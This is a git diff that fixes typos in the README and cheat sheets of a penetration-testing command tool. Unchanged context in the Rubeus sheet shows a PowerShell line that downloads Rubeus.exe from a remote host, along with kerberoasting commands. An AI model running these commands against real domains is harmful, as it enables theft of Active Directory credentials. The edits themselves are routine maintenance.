diff --git a/README.md b/README.md index 092f7f0..c687ef4 100644 --- a/README.md +++ b/README.md @@ -76,7 +76,7 @@ yay -S arsenal ``` ./run -t # if you launch arsenal in a tmux window with one pane, it will split the window and send the command to the otherpane without quitting arsenal - # if the window is already splited the command will be send to the other pane without quitting arsenal + # if the window is already split the command will be send to the other pane without quitting arsenal ./run -t -e # just like the -t mode but with direct execution in the other pane without quitting arsenal ``` diff --git a/arsenal/data/cheats/Active_directory/rubeus.md b/arsenal/data/cheats/Active_directory/rubeus.md index 571c363..e5bbb7c 100644 --- a/arsenal/data/cheats/Active_directory/rubeus.md +++ b/arsenal/data/cheats/Active_directory/rubeus.md @@ -50,7 +50,7 @@ $data = (New-Object System.Net.WebClient).DownloadData('http:///Rubeus.ex .\Rubeus.exe kerberoast /outfile: ``` -## Kerberoasting and outputting on a file with a spesific format +## Kerberoasting and outputting on a file with a specific format #plateform/windows #target/remote #cat/ATTACK/EXPLOIT ```cmd .\Rubeus.exe kerberoast /outfile: /domain: diff --git a/arsenal/data/cheats/Databases/redis.md b/arsenal/data/cheats/Databases/redis.md index 20df14f..33fc898 100644 --- a/arsenal/data/cheats/Databases/redis.md +++ b/arsenal/data/cheats/Databases/redis.md @@ -13,17 +13,17 @@ redis-cli redis-cli -h -a ``` -## connect remotly specifying a port +## connect remotely specifying a port ```bash redis-cli -h -p -a ``` -## connect remotly over tls w/ server certificate +## connect remotely over tls w/ server certificate ```bash redis-cli -h --tls --cacert ``` -## connect remotly over tls w/ server & client certificates +## connect remotely over tls w/ server & client certificates ```bash redis-cli -h --tls --cacert --cert --key ``` diff --git a/arsenal/data/cheats/Install/yum.md b/arsenal/data/cheats/Install/yum.md index 45c5008..c86b59c 100644 --- a/arsenal/data/cheats/Install/yum.md +++ b/arsenal/data/cheats/Install/yum.md @@ -38,7 +38,7 @@ yum check-update yum update ``` -## Update spesific/individual package +## Update specific/individual package ``` yum update ``` @@ -86,4 +86,4 @@ yum whatprovides ## List currently enabled repositories ``` yum repolist -``` \ No newline at end of file +``` diff --git a/arsenal/data/cheats/Tools/docker.md b/arsenal/data/cheats/Tools/docker.md index f826f78..eefa8d1 100644 --- a/arsenal/data/cheats/Tools/docker.md +++ b/arsenal/data/cheats/Tools/docker.md @@ -56,13 +56,13 @@ $ container_id: docker ps --- --headers 1 --column 1 # Builds, (re)creates, starts, and attaches to containers for all services docker-compose up -# Builds, (re)creates, starts, and dettaches to containers for all services +# Builds, (re)creates, starts, and detaches to containers for all services docker-compose up -d # Builds, (re)creates, starts, and attaches to containers for a service docker-compose up -d -# Builds, (re)creates, starts, and dettaches to containers for a service +# Builds, (re)creates, starts, and detaches to containers for a service docker-compose up -d # Print the last lines of a service’s logs